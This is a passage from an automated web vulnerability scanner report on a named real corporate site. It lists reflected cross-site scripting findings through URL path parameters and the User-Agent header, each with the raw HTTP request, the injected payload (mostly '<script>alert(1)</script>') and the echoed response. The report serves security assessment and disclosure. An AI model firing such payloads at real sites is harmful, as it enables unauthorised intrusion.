1.1159. http://www.verizonbusiness.com/worldwide/resources/media/large-131513-mitsui.xml [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /worldwide/resources/media/large-131513-mitsui.xml

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d5ad6"%3b471b21e6a30 was submitted in the REST URL parameter 2. This input was echoed as d5ad6";471b21e6a30 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /worldwide/resourcesd5ad6"%3b471b21e6a30/media/large-131513-mitsui.xml HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 01:01:28 GMT
Content-Type: text/html
Content-Length: 40678
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 01:01:28 GMT
Connection: close
Expires: Mon, 16 Nov 2009 19:01:28 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link hre
...[SNIP]...
atch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/worldwide/resourcesd5ad6";471b21e6a30/media/large-131513-mitsui.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELE
...[SNIP]...

1.1160. http://www.verizonbusiness.com/worldwide/resources/media/large-131513-mitsui.xml [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /worldwide/resources/media/large-131513-mitsui.xml

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f6565'%3badba750a278 was submitted in the REST URL parameter 2. This input was echoed as f6565';adba750a278 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /worldwide/resourcesf6565'%3badba750a278/media/large-131513-mitsui.xml HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 01:01:38 GMT
Content-Type: text/html
Content-Length: 40678
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 01:01:38 GMT
Connection: close
Expires: Mon, 16 Nov 2009 19:01:38 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link type="text/css" href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet"><link med
...[SNIP]...
<script type="text/javascript">
var request='/worldwide/resourcesf6565';adba750a278/media/large-131513-mitsui.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.1161. http://www.verizonbusiness.com/worldwide/resources/media/large-131513-mitsui.xml [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /worldwide/resources/media/large-131513-mitsui.xml

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 50074"%3b1df4138d71 was submitted in the REST URL parameter 3. This input was echoed as 50074";1df4138d71 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /worldwide/resources/media50074"%3b1df4138d71/large-131513-mitsui.xml HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 01:01:50 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40286
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 01:01:50 GMT
Connection: close
Expires: Mon, 16 Nov 2009 19:01:50 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link hre
...[SNIP]...
) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/worldwide/resources/media50074";1df4138d71/large-131513-mitsui.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS
...[SNIP]...

1.1162. http://www.verizonbusiness.com/worldwide/resources/media/large-131513-mitsui.xml [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /worldwide/resources/media/large-131513-mitsui.xml

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c6204'%3bb4459472f80 was submitted in the REST URL parameter 3. This input was echoed as c6204';b4459472f80 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /worldwide/resources/mediac6204'%3bb4459472f80/large-131513-mitsui.xml HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 01:01:59 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40288
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 01:02:00 GMT
Connection: close
Expires: Mon, 16 Nov 2009 19:01:59 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link hre
...[SNIP]...
<script type="text/javascript">
var request='/worldwide/resources/mediac6204';b4459472f80/large-131513-mitsui.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.1163. http://www.verizonbusiness.com/worldwide/resources/media/large-131513-mitsui.xml [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.verizonbusiness.com
Path:   /worldwide/resources/media/large-131513-mitsui.xml

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 82ffb</script><script>alert(1)</script>b1de1379f80 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /worldwide/resources/media/large-131513-mitsui.xml82ffb</script><script>alert(1)</script>b1de1379f80 HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 200 OK
Server: Roxen/4.5.146-release3
ETag: "d9da2b056f6436c71cd013f2136ec6d7"
Last-Modified: Wed, 17 Nov 2010 01:02:23 GMT
Content-Type: text/html; charset=ISO-8859-1
Vary: User-Agent
Date: Wed, 17 Nov 2010 01:02:23 GMT
Content-Length: 17257
Connection: close
Set-Cookie: BERT=VRID%3d4191c186-ae11-4bf8-8346-8a381dedb7e9|VTID%3dabb77705-cd09-4409-a863-69e787434097|SX%3d1289956943|VP%3d1|RMC%3dxg|LP%3den; expires=Tue, 17 Nov 2015 06:06:07 GMT; domain=www.verizonbusiness.com; path=/
Expires: Mon, 16 Nov 2009 19:02:23 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link type="text/css" rel="stylesheet" href="/(15:46:12)/templates/vzbar/style.css"><link med
...[SNIP]...
<url>/worldwide/resources/media/large-131513-mitsui.xml82ffb</script><script>alert(1)</script>b1de1379f80</url>
...[SNIP]...

1.1164. http://www.verizonbusiness.com/Medium/ [User-Agent HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.verizonbusiness.com
Path:   /Medium/

Issue detail

The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d2370</script><script>alert(1)</script>1fabb20e843 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Medium/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)d2370</script><script>alert(1)</script>1fabb20e843
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 200 OK
Server: Roxen/4.5.146-release3
ETag: "e3c0ffa39d75e7210afebf4ecd9f361d"
Last-Modified: Wed, 17 Nov 2010 00:54:02 GMT
Content-Type: text/html; charset=ISO-8859-1
Vary: User-Agent
Date: Wed, 17 Nov 2010 00:54:02 GMT
Content-Length: 26715
Connection: close
Set-Cookie: BERT=VRID%3d60f8bbd1-9c76-448d-93af-3cc687506520|VTID%3d3b9e7c43-8877-4ac5-925d-38a89c7cd894|SX%3d1289956442|VP%3d1|RMC%3dxg|LP%3den; expires=Tue, 17 Nov 2015 05:57:46 GMT; domain=www.verizonbusiness.com; path=/
Expires: Mon, 16 Nov 2009 18:54:02 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html lang="en">

<head>
<script language="JavaScript" type="text/javascript">
var regC = /https?:\/\/.*?\/\
...[SNIP]...

swfobject.embedSWF("medium_business_splash_preloader.swf?SetLang=en", "flash2", "1000", "375", "6", "",flashvars,flashparams,{},function(e){
var ua="Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)d2370</script><script>alert(1)</script>1fabb20e843";
var q="<q>
...[SNIP]...

1.1165. http://www.verizonbusiness.com/ar/ [User-Agent HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.verizonbusiness.com
Path:   /ar/

Issue detail

The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ad3c5</script><script>alert(1)</script>9c5c78374da was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ar/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)ad3c5</script><script>alert(1)</script>9c5c78374da
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 200 OK
Server: Roxen/4.5.146-release3
ETag: "63d0190eb8cbccb4035132e091029a68"
Last-Modified: Wed, 17 Nov 2010 00:55:40 GMT
Content-Type: text/html; charset=UTF-8
Vary: User-Agent
Date: Wed, 17 Nov 2010 00:55:41 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: BERT=VRID%3d3b89e2c2-08e1-4b92-b047-287f610fa8a4|VTID%3d52438f59-e9a7-431f-a54c-7b5d946c36ee|SX%3d1289956539|VP%3d1|RMC%3dxg|LP%3den; expires=Tue, 17 Nov 2015 05:59:23 GMT; domain=www.verizonbusiness.com; path=/
Expires: Mon, 16 Nov 2009 18:55:40 GMT
Content-Length: 53855

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html lang="es">

<head>
<script type="text/javascript" language="JavaScript">
var regC = /https?:\/\/.*?\/\
...[SNIP]...
bject.embedSWF("/homepage/vzb_homepage_2010_preloader.swf?SetLang=es", "flash2", "1000", "500", "6", "",flashvars,flashparams,{},function(e){
var ua="Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)ad3c5</script><script>alert(1)</script>9c5c78374da";
var q="<q>
...[SNIP]...

1.1166. http://www.verizonbusiness.com/at/ [User-Agent HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.verizonbusiness.com
Path:   /at/

Issue detail

The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 691a8</script><script>alert(1)</script>3da1fca7b09 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /at/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)691a8</script><script>alert(1)</script>3da1fca7b09
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 200 OK
Server: Roxen/4.5.146-release3
ETag: "1651302070d72ba338a3a74900d4d54e"
Last-Modified: Wed, 17 Nov 2010 00:56:02 GMT
Content-Type: text/html; charset=UTF-8
Vary: User-Agent
Date: Wed, 17 Nov 2010 00:56:02 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: BERT=VRID%3dc76e16cf-1a65-4af2-afc7-d296e93af038|VTID%3d1e974eac-5608-4ffd-9b2f-9ba57c49db45|SX%3d1289956561|VP%3d1|RMC%3dxg|LP%3den; expires=Tue, 17 Nov 2015 05:59:45 GMT; domain=www.verizonbusiness.com; path=/
Expires: Mon, 16 Nov 2009 18:56:02 GMT
Content-Length: 53267

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html lang="de">

<head>
<script language="JavaScript" type="text/javascript">
var regC = /https?:\/\/.*?\/\
...[SNIP]...
bject.embedSWF("/homepage/vzb_homepage_2010_preloader.swf?SetLang=de", "flash2", "1000", "500", "6", "",flashvars,flashparams,{},function(e){
var ua="Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)691a8</script><script>alert(1)</script>3da1fca7b09";
var q="<q>
...[SNIP]...

1.1167. http://www.verizonbusiness.com/cl/ [User-Agent HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.verizonbusiness.com
Path:   /cl/

Issue detail

The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8075d</script><script>alert(1)</script>187bfcab8ff was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cl/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)8075d</script><script>alert(1)</script>187bfcab8ff
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 200 OK
Server: Roxen/4.5.146-release3
ETag: "1f781d2b402ca3aab8ae47d7a984a659"
Last-Modified: Wed, 17 Nov 2010 00:56:25 GMT
Content-Type: text/html; charset=UTF-8
Vary: User-Agent
Date: Wed, 17 Nov 2010 00:56:25 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: BERT=VRID%3dafadd073-3fe7-4efe-8109-1cf4aaa32b73|VTID%3d631365ec-560d-4ed0-a7d7-0fb05fe1f87f|SX%3d1289956583|VP%3d1|RMC%3dxg|LP%3den; expires=Tue, 17 Nov 2015 06:00:07 GMT; domain=www.verizonbusiness.com; path=/
Expires: Mon, 16 Nov 2009 18:56:25 GMT
Content-Length: 53837

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html lang="es">

<head>
<script language="JavaScript" type="text/javascript">
var regC = /https?:\/\/.*?\/\
...[SNIP]...
bject.embedSWF("/homepage/vzb_homepage_2010_preloader.swf?SetLang=es", "flash2", "1000", "500", "6", "",flashvars,flashparams,{},function(e){
var ua="Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)8075d</script><script>alert(1)</script>187bfcab8ff";
var q="<q>
...[SNIP]...

1.1168. http://www.verizonbusiness.com/co/ [User-Agent HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.verizonbusiness.com
Path:   /co/

Issue detail

The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 21233</script><script>alert(1)</script>3ad75d0114d was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /co/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)21233</script><script>alert(1)</script>3ad75d0114d
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 200 OK
Server: Roxen/4.5.146-release3
ETag: "699c2fd4bf6f94c670d457392dfa155b"
Last-Modified: Wed, 17 Nov 2010 00:56:13 GMT
Content-Type: text/html; charset=UTF-8
Vary: User-Agent
Date: Wed, 17 Nov 2010 00:56:14 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: BERT=VRID%3deadee65d-048d-456d-9fd4-69abcbbcdce8|VTID%3dcd7c26ae-bc6c-4c1a-92ca-b410eaf8965e|SX%3d1289956572|VP%3d1|RMC%3dxg|LP%3den; expires=Tue, 17 Nov 2015 05:59:56 GMT; domain=www.verizonbusiness.com; path=/
Expires: Mon, 16 Nov 2009 18:56:13 GMT
Content-Length: 53908

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html lang="es">

<head>
<script language="JavaScript" type="text/javascript">
var regC = /https?:\/\/.*?\/\
...[SNIP]...
bject.embedSWF("/homepage/vzb_homepage_2010_preloader.swf?SetLang=es", "flash2", "1000", "500", "6", "",flashvars,flashparams,{},function(e){
var ua="Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)21233</script><script>alert(1)</script>3ad75d0114d";
var q="<q>
...[SNIP]...

1.1169. http://www.verizonbusiness.com/de/ [User-Agent HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.verizonbusiness.com
Path:   /de/

Issue detail

The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload af933</script><script>alert(1)</script>09cd83e5f31 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /de/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)af933</script><script>alert(1)</script>09cd83e5f31
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 200 OK
Server: Roxen/4.5.146-release3
ETag: "8ff2da68f082767c8658e3842ec772c9"
Last-Modified: Wed, 17 Nov 2010 00:56:42 GMT
Content-Type: text/html; charset=UTF-8
Vary: User-Agent
Date: Wed, 17 Nov 2010 00:56:42 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: BERT=VRID%3dae5d3222-e39b-4462-a8da-fe0770b9db10|VTID%3dc5881ae4-ca23-4bcf-b70d-2783cd80dc2a|SX%3d1289956600|VP%3d1|RMC%3dxg|LP%3den; expires=Tue, 17 Nov 2015 06:00:24 GMT; domain=www.verizonbusiness.com; path=/
Expires: Mon, 16 Nov 2009 18:56:42 GMT
Content-Length: 53358

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html lang="de">

<head>
<script language="JavaScript" type="text/javascript">
var regC = /https?:\/\/.*?\/\
...[SNIP]...
bject.embedSWF("/homepage/vzb_homepage_2010_preloader.swf?SetLang=de", "flash2", "1000", "500", "6", "",flashvars,flashparams,{},function(e){
var ua="Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)af933</script><script>alert(1)</script>09cd83e5f31";
var q="<q>
...[SNIP]...

1.1170. http://www.verizonbusiness.com/es/ [User-Agent HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.verizonbusiness.com
Path:   /es/

Issue detail

The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f97ff</script><script>alert(1)</script>18bb90f6273 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /es/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)f97ff</script><script>alert(1)</script>18bb90f6273
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 200 OK
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
ETag: "f07977496701d7b772526dcaebb5ae4c"
Last-Modified: Wed, 17 Nov 2010 01:00:16 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 53745
Date: Wed, 17 Nov 2010 01:00:16 GMT
Connection: close
